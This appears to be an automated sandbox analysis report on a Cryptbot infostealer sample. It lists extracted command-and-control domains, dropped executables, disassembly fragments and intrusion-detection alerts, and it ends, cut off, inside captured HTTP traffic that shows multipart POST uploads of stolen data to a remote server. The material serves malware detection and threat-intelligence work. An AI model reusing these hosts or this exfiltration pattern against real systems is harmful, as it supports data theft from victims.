Source: LkCinYWgNh.exe.2300.0.memstrmin |
Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "HASH-DRBGs.top", "home.tventji20vs.top", "0/80/home.tventji20vs.top", "vs.top", "0/80/tventji20vs.top", "tventji20vs.top", ".1.1home.tventji20vs.top", "QUERY|rd|A|IN|home.tventji20vs.top", "ventji20vs.top", "QUERY|rd|A|IN|tventji20vs.top", "QUERY|rd|AAAA|IN|home.tventji20vs.top", "v|AAAA|IN|tventji20vs.top", "s.top", "CTR-DRBGvs.top"]} |
Source: LkCinYWgNh.exe |
ReversingLabs: Detection: 18% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 7_2_009A15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
7_2_009A15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 7_2_6C7414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
7_2_6C7414B0 |
Source: LkCinYWgNh.exe, 00000000.00000000.2194687591.0000000000D04000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
memstr_850d0a4c-b |
Source: LkCinYWgNh.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: LkCinYWgNh.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\LkCinYWgNh.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
7_2_009A81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BAEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
7_2_6C760860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
7_2_6C76A970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
7_2_6C76A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
7_2_6C76A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C81F960h |
7_2_6C75EB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C764453 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
7_2_6C7E84A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
7_2_6C76C510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
7_2_6C76A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
7_2_6C76A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
7_2_6C76A580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
7_2_6C76E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
7_2_6C76E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
7_2_6C760740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
7_2_6C7E0730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BC040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
7_2_6C79A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BC1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
7_2_6C760260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C81D014h] |
7_2_6C814360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BBD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
7_2_6C7B7D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
7_2_6C7B3840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
7_2_6C76D974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
7_2_6C799B60 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
7_2_6C77BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
7_2_6C77BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C7BB4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
7_2_6C76D504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
7_2_6C76D674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
7_2_6C7B9600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C81DFF4h |
7_2_6C7B3690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
7_2_6C76D7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
7_2_6C7E3140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C75B1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
7_2_6C76D2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
7_2_6C7D7350 |
Source: chrome.exe |
Memory has grown: Private usage: 8MB later: 29MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:61304 -> 147.45.48.137:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:61305 -> 147.45.48.137:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:61319 -> 147.45.48.137:80 |
Source: Malware configuration extractor |
URLs: analforeverlovyu.top |
Source: Malware configuration extractor |
URLs: HASH-DRBGs.top |
Source: Malware configuration extractor |
URLs: home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: 0/80/home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: vs.top |
Source: Malware configuration extractor |
URLs: 0/80/tventji20vs.top |
Source: Malware configuration extractor |
URLs: tventji20vs.top |
Source: Malware configuration extractor |
URLs: .1.1home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: QUERY|rd|A|IN|home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: ventji20vs.top |
Source: Malware configuration extractor |
URLs: QUERY|rd|A|IN|tventji20vs.top |
Source: Malware configuration extractor |
URLs: QUERY|rd|AAAA|IN|home.tventji20vs.top |
Source: Malware configuration extractor |
URLs: v|AAAA|IN|tventji20vs.top |
Source: Malware configuration extractor |
URLs: s.top |
Source: Malware configuration extractor |
URLs: CTR-DRBGvs.top |
Source: global traffic |
TCP traffic: 192.168.2.6:61114 -> 1.1.1.1:53 |
Source: global traffic |
HTTP traffic detected: GET /NWYJPzCYEvZpxoyKvBIK1729953292 HTTP/1.1Host: home.tventji20vs.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20vs.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------V4Pn24IuntR7WG1N8OeIxhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 34 50 6e 32 34 49 75 6e 74 52 37 57 47 31 4e 38 4f 65 49 78 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 65 71 75 66 6f 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 33 cb d8 ac 87 68 aa ee df 27 16 b1 c4 25 2e 0a d6 e1 f5 2c 68 9d 0a e3 76 07 50 97 48 1f 6a 6a 54 be 90 8d b9 a7 e2 5e a8 65 f7 0c dd 30 2a 7b 9d cb d1 c5 d8 89 a9 f1 07 d0 e1 e7 7b 9f 9b d3 af ec 2f cd 83 9f 3e e6 8f e1 05 69 82 d8 f8 af 40 c5 f6 18 11 1f 1e 3e ab 56 19 dc 3f a4 af e4 9f c9 7b 65 0a b1 43 43 cf 08 95 f4 23 3c a2 2c de 8d de d4 6f 86 94 bb f1 ec 23 ee 42 f9 61 7c fb c5 21 d1 2e 55 b8 fb 68 94 e2 6b 7b 22 cb b9 1c 6b 3e 17 f5 cd 94 dd 03 15 17 7f 1a a3 56 2c 04 7b ad ef 63 05 6b 42 30 15 36 ab 63 0d 0a 95 04 03 8e a5 ca e5 62 0d 3e 04 10 f4 a9 7a 62 26 52 56 b4 b0 9e c7 c4 35 1c 2d 4f e6 03 65 45 f8 d1 87 8a 7e fc 1c ea a3 53 06 46 ba c4 db ad c1 72 66 b2 ea 30 dd f1 07 4b 37 83 c4 e6 5e 9e 7b d6 c5 3c 6c 3f 27 23 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 34 50 6e 32 34 49 75 6e 74 52 37 57 47 31 4e 38 4f 65 49 78 68 2d 2d 0d 0a Data Ascii: --------------------------V4Pn24IuntR7WG1N8OeIxhContent-Disposition: form-data; name="file"; filename="Jequfob.bin"Content-Type: application/octet-stream#3h'%.,hvPHjjT^e0*{{/>i@>V?{eCC#<,o#Ba|!.Uhk{"k>V,{ckB06cb>zb&RV5-OeE~SFrf0K7^{<l?'#--------------------------V4Pn24IuntR7WG1N8OeIxh-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20vs.topAccept: */*Content-Length: 82604Content-Type: multipart/form-data; boundary=------------------------LbiufPujvlSxdoh0ogqJgVData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 62 69 75 66 50 75 6a 76 6c 53 78 64 6f 68 30 6f 67 71 4a 67 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 65 67 69 6a 6f 63 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 99 be 93 9d 13 ca 93 8f 0d dd 04 40 22 c6 0d 98 81 88 e2 a2 03 9a 0f 98 f4 65 f9 15 ac cf 11 6a d2 65 a7 03 f3 9d 9e 14 45 35 81 10 a2 d6 07 9d a8 9d 66 87 3f f6 cf b3 5f 16 01 e5 53 9c e4 6d be 7a c1 31 50 ea 31 47 75 47 6a b5 26 bd c1 f2 66 5e 7f 8f 88 fb eb aa 68 9f ea 03 b2 d0 a1 7d ab 15 22 cc bc 35 c9 7f c6 e9 d8 06 64 24 ae 16 92 09 f5 0a d6 81 ee e3 72 bc 34 1d f1 a5 a9 ee ca b9 63 75 42 71 fa 7c f0 3c de 41 d7 31 b3 18 b6 79 67 6e 26 1f db 7b bd 12 79 de 8f ee 5c a5 60 da b9 fc 62 9d b6 18 23 81 69 6d a9 16 fd 24 64 41 82 4f 6f 49 ef 31 7a b0 18 73 68 85 4d d3 fd a9 b1 4a c6 ed 99 18 0f 6b 00 13 7d 7a f0 25 4f cf de d1 7a 28 07 d2 c9 59 0e 37 18 cc e1 6c b0 dc 6a 17 06 ab 14 b2 21 d5 4d 3f be 4c 8c 49 38 a9 b2 e0 ff b3 39 0c 50 94 f4 2f 84 65 9c ea 48 d8 4a a9 9d c0 8b 08 aa 32 1e 6d 33 af 3c 47 a3 93 23 a0 51 63 d3 e3 ee d8 68 50 8d e3 b4 06 b9 4b b2 08 c1 a2 64 9e d9 d6 f9 a4 15 3c ec f4 d2 c3 2f 0c 24 1c ab 30 9c 10 92 a7 1f ca 72 20 64 13 9e 5a 1a ce 62 65 e3 ae 2c b2 ac 56 f2 07 ee 51 4a 22 bb 6b a0 f7 a9 77 57 15 ef db 39 37 27 65 fe 07 f5 fd 65 b1 a7 66 cc 08 29 e9 4d ea be 0c c8 5d c7 77 b4 65 54 2b 67 92 3a c4 04 51 c5 50 c0 f0 1a 8e 9b 6c 39 db 7d 72 24 47 96 da bd 7d f9 5c f6 c2 bb 3e 05 aa f5 b4 b9 78 63 36 88 14 4f 90 55 cc 73 95 ac fc 1c c8 ec 59 ff 29 63 8f 14 02 ef 11 f0 88 db 95 9c 1b 8b 02 87 80 4c 8d d4 ba 97 ba 10 59 f1 90 7b b3 48 77 76 de be d9 0a 3f d5 08 c5 24 1d 47 07 e8 af e5 b4 18 d9 65 e5 a8 8f 66 75 92 c4 fa bd b4 e5 5c 59 f3 5d 9a f1 cd 85 b1 f7 48 53 5b 4d 53 29 5a 78 15 80 38 57 59 11 00 71 43 cc c4 2a 60 d4 58 5f 64 eb 06 d7 d6 66 07 09 e5 be 0a 9e 9d 6b 33 db 22 8f e0 07 f9 6c c8 9c 50 25 10 9c e1 8d 9c 81 07 b6 84 aa 2b ce 32 c2 a1 5a 51 96 64 1f 7f bc c4 11 77 63 63 65 6d a8 40 00 dc 35 07 96 60 af bd 65 2a a |